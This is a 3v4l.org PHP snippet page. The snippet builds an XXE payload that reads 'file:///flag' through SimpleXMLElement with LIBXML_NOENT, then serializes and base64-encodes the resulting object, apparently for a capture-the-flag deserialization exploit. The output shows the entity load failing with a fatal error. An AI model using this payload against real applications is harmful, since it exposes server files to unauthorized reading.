3v4l.org

run code in 500+ PHP versions simultaneously
<?php class UserPref { public $theme; public $lang; } $xml = '<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <root>&xxe;</root>'; $obj = new UserPref(); $obj->theme = new SimpleXMLElement($xml, LIBXML_NOENT); $obj->lang = "zh"; echo base64_encode(serialize($obj)); ?>
Output for 8.2.31, 8.3.0 - 8.3.31, 8.4.1 - 8.4.22, 8.5.0 - 8.5.7
Warning: SimpleXMLElement::__construct(): I/O warning : failed to load external entity "file:///flag" in /in/XAGtm on line 14 Warning: SimpleXMLElement::__construct(): Entity: line 5: parser error : Failure to process entity xxe in /in/XAGtm on line 14 Warning: SimpleXMLElement::__construct(): <root>&xxe;</root> in /in/XAGtm on line 14 Warning: SimpleXMLElement::__construct(): ^ in /in/XAGtm on line 14 Warning: SimpleXMLElement::__construct(): Entity: line 5: parser error : Entity 'xxe' not defined in /in/XAGtm on line 14 Warning: SimpleXMLElement::__construct(): <root>&xxe;</root> in /in/XAGtm on line 14 Warning: SimpleXMLElement::__construct(): ^ in /in/XAGtm on line 14 Fatal error: Uncaught Exception: String could not be parsed as XML in /in/XAGtm:14 Stack trace: #0 /in/XAGtm(14): SimpleXMLElement->__construct('<?xml version="...', 2) #1 {main} thrown in /in/XAGtm on line 14
Process exited with code 255.
preferences:
44.77 ms | 812 KiB | 4 Q